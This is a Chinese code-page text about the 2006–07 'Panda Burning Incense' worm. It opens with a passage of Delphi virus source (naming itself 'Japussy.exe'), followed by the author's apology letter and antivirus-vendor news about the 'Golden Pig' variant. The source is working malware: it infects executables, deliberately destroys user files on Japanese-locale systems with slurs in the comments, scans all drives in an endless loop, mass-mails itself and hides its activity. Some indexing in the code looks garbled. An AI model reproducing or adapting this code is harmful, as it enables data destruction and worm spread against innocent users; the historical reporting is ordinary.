?? 熊貓燒香百科.txt
字號(hào):
DstStream.Write(iID, 4);
finally
HdrStream.Free;
end;
finally
SrcStream.Free;
IcoStream.Free;
DstStream.SaveToFile(FileName); //替換宿主文件
DstStream.Free;
end;
except;
end;
end;
{ 將目標(biāo)文件寫入垃圾碼后刪除 }
procedure SmashFile(FileName: string);
var
FileHandle: Integer;
i, Size, Mass, Max, Len: Integer;
begin
try
SetFileAttributes(PChar(FileName), 0); //去掉只讀屬性
FileHandle := FileOpen(FileName, fmOpenWrite); //打開文件
try
Size := GetFileSize(FileHandle, nil); //文件大小
i := 0;
Randomize;
Max := Random(15); //寫入垃圾碼的隨機(jī)次數(shù)
if Max < 5 then
Max := 5;
Mass := Size div Max; //每個(gè)間隔塊的大小
Len := Length(Catchword);
while i < Max do
begin
FileSeek(FileHandle, i * Mass, 0); //定位
//寫入垃圾碼,將文件徹底破壞掉
FileWrite(FileHandle, Catchword, Len);
Inc(i);
end;
finally
FileClose(FileHandle); //關(guān)閉文件
end;
DeleteFile(PChar(FileName)); //刪除之
except
end;
end;
{ 獲得可寫的驅(qū)動(dòng)器列表 }
function GetDrives: string;
var
DiskType: Word;
D: Char;
Str: string;
i: Integer;
begin
for i := 0 to 25 do //遍歷26個(gè)字母
begin
D := Chr(i + 65);
Str := D + ':\';
DiskType := GetDriveType(PChar(Str));
//得到本地磁盤和網(wǎng)絡(luò)盤
if (DiskType = DRIVE_FIXED) or (DiskType = DRIVE_REMOTE) then
Result := Result + D;
end;
end;
{ 遍歷目錄,感染和摧毀文件 }
procedure LoopFiles(Path, Mask: string);
var
i, Count: Integer;
Fn, Ext: string;
SubDir: TStrings;
SearchRec: TSearchRec;
Msg: TMsg;
function IsValidDir(SearchRec: TSearchRec): Integer;
begin
if (SearchRec.Attr <> 16) and (SearchRec.Name <> '.') and
(SearchRec.Name <> '..') then
Result := 0 //不是目錄
else if (SearchRec.Attr = 16) and (SearchRec.Name <> '.') and
(SearchRec.Name <> '..') then
Result := 1 //不是根目錄
else Result := 2; //是根目錄
end;
begin
if (FindFirst(Path + Mask, faAnyFile, SearchRec) = 0) then
begin
repeat
PeekMessage(Msg, 0, 0, 0, PM_REMOVE); //調(diào)整消息隊(duì)列,避免引起懷疑
if IsValidDir(SearchRec) = 0 then
begin
Fn := Path + SearchRec.Name;
Ext := UpperCase(ExtractFileExt(Fn));
if (Ext = '.EXE') or (Ext = '.SCR') then
begin
InfectOneFile(Fn); //感染可執(zhí)行文件
end
else if (Ext = '.HTM') or (Ext = '.HTML') or (Ext = '.ASP') then
begin
//感染HTML和ASP文件,將Base64編碼后的病毒寫入
//感染瀏覽此網(wǎng)頁的所有用戶
//哪位大兄弟愿意完成之?
end
else if Ext = '.WAB' then //Outlook地址簿文件
begin
//獲取Outlook郵件地址
end
else if Ext = '.ADC' then //Foxmail地址自動(dòng)完成文件
begin
//獲取Foxmail郵件地址
end
else if Ext = 'IND' then //Foxmail地址簿文件
begin
//獲取Foxmail郵件地址
end
else
begin
if IsJap then //是倭文操作系統(tǒng)
begin
if (Ext = '.DOC') or (Ext = '.XLS') or (Ext = '.MDB') or
(Ext = '.MP3') or (Ext = '.RM') or (Ext = '.RA') or
(Ext = '.WMA') or (Ext = '.ZIP') or (Ext = '.RAR') or
(Ext = '.MPEG') or (Ext = '.ASF') or (Ext = '.JPG') or
(Ext = '.JPEG') or (Ext = '.GIF') or (Ext = '.SWF') or
(Ext = '.PDF') or (Ext = '.CHM') or (Ext = '.AVI') then
SmashFile(Fn); //摧毀文件
end;
end;
end;
//感染或刪除一個(gè)文件后睡眠200毫秒,避免CPU占用率過高引起懷疑
Sleep(200);
until (FindNext(SearchRec) <> 0);
end;
FindClose(SearchRec);
SubDir := TStringList.Create;
if (FindFirst(Path + '*.*', faDirectory, SearchRec) = 0) then
begin
repeat
if IsValidDir(SearchRec) = 1 then
SubDir.Add(SearchRec.Name);
until (FindNext(SearchRec) <> 0);
end;
FindClose(SearchRec);
Count := SubDir.Count - 1;
for i := 0 to Count do
LoopFiles(Path + SubDir.Strings + '\', Mask);
FreeAndNil(SubDir);
end;
{ 遍歷磁盤上所有的文件 }
procedure InfectFiles;
var
DriverList: string;
i, Len: Integer;
begin
if GetACP = 932 then //日文操作系統(tǒng)
IsJap := True; //去死吧!
DriverList := GetDrives; //得到可寫的磁盤列表
Len := Length(DriverList);
while True do //死循環(huán)
begin
for i := Len downto 1 do //遍歷每個(gè)磁盤驅(qū)動(dòng)器
LoopFiles(DriverList + ':\', '*.*'); //感染之
SendMail; //發(fā)帶毒郵件
Sleep(1000 * 60 * 5); //睡眠5分鐘
end;
end;
{ 主程序開始 }
begin
if IsWin9x then //是Win9x
RegisterServiceProcess(GetCurrentProcessID, 1) //注冊(cè)為服務(wù)進(jìn)程
else //WinNT
begin
//遠(yuǎn)程線程映射到Explorer進(jìn)程
//哪位兄臺(tái)愿意完成之?
end;
//如果是原始病毒體自己
if CompareText(ExtractFileName(ParamStr(0)), 'Japussy.exe') = 0 then
InfectFiles //感染和發(fā)郵件
else //已寄生于宿主程序上了,開始工作
begin
TmpFile := ParamStr(0); //創(chuàng)建臨時(shí)文件
Delete(TmpFile, Length(TmpFile) - 4, 4);
TmpFile := TmpFile + #32 + '.exe'; //真正的宿主文件,多一個(gè)空格
ExtractFile(TmpFile); //分離之
FillStartupInfo(Si, SW_SHOWDEFAULT);
CreateProcess(PChar(TmpFile), PChar(TmpFile), nil, nil, True,
0, nil, '.', Si, Pi); //創(chuàng)建新進(jìn)程運(yùn)行之
InfectFiles; //感染和發(fā)郵件
end;
end.
【熊貓燒香的第一版作者道歉信】
各位網(wǎng)友:
你們好!我是熊貓燒香的第一版作者.
我真的沒有想到熊貓燒香在短短的兩個(gè)月竟然瘋狂感染到這個(gè)地步,真的是我的不對(duì),或許真的是我低估了網(wǎng)絡(luò)的力量,它的散播速度是我想不到的!對(duì)于所有中毒的網(wǎng)友,企業(yè)來說,可能是一個(gè)很大的打擊,我對(duì)此表示深深的歉意!很對(duì)不起!
我要解釋一些事情,有人說熊貓燒香更改熊貓的圖標(biāo)是我在詆毀大熊貓!這里我要解釋下,這是絕對(duì)沒有的事情,完全是出于這個(gè)圖片比較讓我個(gè)人喜歡,才會(huì)用的!
還有關(guān)于變種,我寫這個(gè)的初衷也是這個(gè),純粹是為了編程研究,對(duì)于出了這么多變種,我是根本想不到的,這個(gè)責(zé)任也不全是在我的!還有人說熊貓病毒寫出來是商業(yè)目的!這個(gè)完全是無稽之談.我在這里承諾,本人是絕對(duì)沒有更新過任何變種!
關(guān)于中毒后的一些錯(cuò)誤,有人中毒后會(huì)有藍(lán)屏,無聲,卡死,文件丟失這些現(xiàn)象!藍(lán)屏和死機(jī)的原因很多可能,熊貓的主程序是不會(huì)造成電腦死機(jī)或藍(lán)屏的,更不會(huì)把別人里面的文件弄丟失!
還有人說我是個(gè)心理變態(tài),我在前面已經(jīng)說了,感染的速度,變種的數(shù)量是我所料想不到的.還有,我寫這個(gè)病毒的初衷完全是為了編程研究.對(duì)于這個(gè)評(píng)論,我也就不多說什么了!
最后就是關(guān)于我的身份,大家不要再猜測(cè)我是誰了,15歲的武漢男生也好,是個(gè)女的也好,某公司老總也好,殺毒廠商也好,光是新聞的評(píng)論,網(wǎng)友的臭罵已經(jīng)讓我后悔之極了!希望熊貓病毒不要再成為炒作的娛樂新聞,不要再出任何關(guān)于熊貓新聞和評(píng)論!希望安全軟件公司,不要吹噓,相互詆毀,相互炒作,盡力做出讓人們信賴的好安全軟件!謝謝大家!
這是我寫的一個(gè)專殺程序,肯定是比不上專業(yè)級(jí)的殺毒軟件了,但是我想這是我最后能給大家做的事情了.
熊貓走了,是結(jié)束嗎?不是的,網(wǎng)絡(luò)永遠(yuǎn)沒有安全的時(shí)候,或許在不久,會(huì)有很多更厲害的病毒出來!所以我在這里提醒大家,提高網(wǎng)絡(luò)安全意識(shí),并不是你應(yīng)該注意的,而是你必須懂得和去做的一些事情!
再一次表示深深的歉意,同時(shí)我發(fā)出這個(gè)專殺,愿能給大家?guī)韼椭?
熊貓燒香的作者
2007年2月9日于仙桃市第一看守所
【變種:金豬報(bào)喜】
金豬報(bào)喜病毒實(shí)際就是最近熊貓燒香的新變種,
春節(jié)將至,然而廣大網(wǎng)絡(luò)用戶仍沒有徹底擺脫“熊貓燒香”的陰霾。伴隨著大量“熊貓燒香”變種的出現(xiàn),對(duì)用戶的危害一浪高過一浪。1月29日,來自金山毒霸反病毒中心最新消息:“熊貓燒香”化身“金豬”,危害指數(shù)再度升級(jí),被感染的電腦中不但“熊貓”成群,而且“金豬”滿圈。但象征財(cái)富的金豬仍然讓用戶無法擺脫“系統(tǒng)被破壞,大量應(yīng)用軟件無法應(yīng)用”的噩夢(mèng)。
病毒描述:
“武漢男生”,俗稱“熊貓燒香”, 近日又化身為“金豬報(bào)喜” ,這是一個(gè)感染型的蠕蟲病毒,它能感染系統(tǒng)中exe,com,pif,src,html,asp等文件,它還能中止大量的反病毒軟件進(jìn)程并且會(huì)刪除擴(kuò)展名為gho的文件,該文件是一系統(tǒng)備份工具GHOST的備份文件,使用戶的系統(tǒng)備份文件丟失。被感染的用戶系統(tǒng)中所有.exe可執(zhí)行文件全部被改成可愛金豬的模樣。
1月30日,江民科技反病毒中心監(jiān)測(cè)到,肆虐互聯(lián)網(wǎng)的“熊貓燒香”又出新變種。此次變種把“熊貓燒香”圖案變成“金豬報(bào)喜”。江民反病毒專家提醒用戶,春節(jié)臨近,謹(jǐn)防春節(jié)期間病毒借人們互致祝福之際大面積爆發(fā)。
專家介紹,“熊貓燒香”去年11月中旬被首次發(fā)現(xiàn),短短兩個(gè)月時(shí)間,新老變種已達(dá)700多種個(gè),據(jù)江民反病毒預(yù)警中心監(jiān)測(cè)到的數(shù)據(jù)顯示,“熊貓燒香” 病毒去年12月一舉闖入病毒排名前20名,1月份更是有望進(jìn)入前10名。疫情最嚴(yán)重的地區(qū)分別為:廣東、山東、江蘇、北京和遼寧。
針對(duì)該病毒,江民殺毒軟件KV系列已緊急升級(jí),用戶升級(jí)到最新病毒庫即可有效防范該病毒于系統(tǒng)之外。江民“熊貓燒香”專殺工具已同步更新,未安裝殺毒軟件的用戶可以登陸江民網(wǎng)站下載殺毒。此外,針對(duì)“熊貓燒香”變種頻繁的特征,江民殺毒軟件KV2007主動(dòng)防御規(guī)則庫可徹底防范“熊貓燒香”及其變種,用戶可以登陸江民反病毒論壇(forum.jiangmin.com)下載使用。
金山毒霸反病毒專家戴光劍指出,伴隨著各大殺毒廠商對(duì)“熊貓燒香”病毒的集中絞殺,該病毒正在不斷“繁衍”新的變種,密謀更加隱蔽的傳播方式。據(jù)不完全統(tǒng)計(jì),僅12月份至今,變種數(shù)已達(dá)90多個(gè),個(gè)人用戶感染熊貓燒香的已經(jīng)高達(dá)幾百萬,企業(yè)用戶感染數(shù)還在繼續(xù)上升。
此外學(xué)生寒假開始,上網(wǎng)人群短期內(nèi)集中上升,病毒的傳播速度也空前加快,所以用戶在進(jìn)行上網(wǎng)的過程中要更加警惕病毒的入侵。據(jù)了解,前幾天在網(wǎng)絡(luò)上出現(xiàn)了 “熊貓燒香”作者聲稱不再有變種出現(xiàn),而“金豬”的出現(xiàn)再次粉碎了人們的美夢(mèng),再次將人們拉回到熊貓燒香的夢(mèng)魘之中。專家稱,按照目前“熊貓燒香”破壞程度,威脅將延伸至春節(jié)。
專家提醒大家,遇到“金豬”不要心慌,用熊貓燒香專殺工具就可以完全對(duì)付這只小金豬啦!
熊貓燒香變身“金豬報(bào)喜”再作亂
由于“熊貓燒香”病毒作者不斷更新變種程序,眾多殺毒軟件無法跟隨病毒的發(fā)展速度。
“熊貓燒香”余毒未盡,新變種接踵而來。據(jù)悉,熊貓燒香已改頭換面變成新病毒“金豬報(bào)喜”。日前,江民、瑞星、金山等反病毒公司已經(jīng)陸續(xù)截獲大量“金豬報(bào)喜”病毒的報(bào)告,而這一病毒甚至可以清除用戶機(jī)器里原有的“熊貓燒香”病毒,并自動(dòng)取而代之。
由于“熊貓燒香”病毒作者不斷更新變種程序,眾多殺毒軟件無法跟隨病毒的發(fā)展速度。而近日出現(xiàn)的“金豬報(bào)喜”病毒圖表,同樣是可愛的小動(dòng)物,但危害卻在與“熊貓燒香”一樣感染EXE文件外,還能感染RAR跟ZIP等格式文件。據(jù)悉目前幾家反病毒廠商尚未推出針對(duì)“金豬報(bào)喜”的專殺工具。
由于春節(jié)臨近,更多新 病毒可能集中出現(xiàn),因此反病毒專家提醒用戶要加強(qiáng)警惕,及時(shí)升級(jí) 殺毒軟件,不要隨便點(diǎn)擊莫名來歷文件。
最虔誠的病毒--熊貓燒香
對(duì)于這個(gè)在06年給人們帶來黑色記憶的病毒,其成因只因?yàn)樽髡邽榱遂乓约憾a(chǎn)生,其借助U盤的傳播方式也引領(lǐng)新的反病毒課題,但這一切都沒有其 LOGO的熊貓給人的印象深刻,熊貓拿著三根香虔誠的祈禱什么?這給很多人以遐想。所以最虔誠的病毒只能頒給舉著香在祈禱的熊貓。 ?? 快捷鍵說明
復(fù)制代碼
Ctrl + C
搜索代碼
Ctrl + F
全屏模式
F11
切換主題
Ctrl + Shift + D
顯示快捷鍵
?
增大字號(hào)
Ctrl + =
減小字號(hào)
Ctrl + -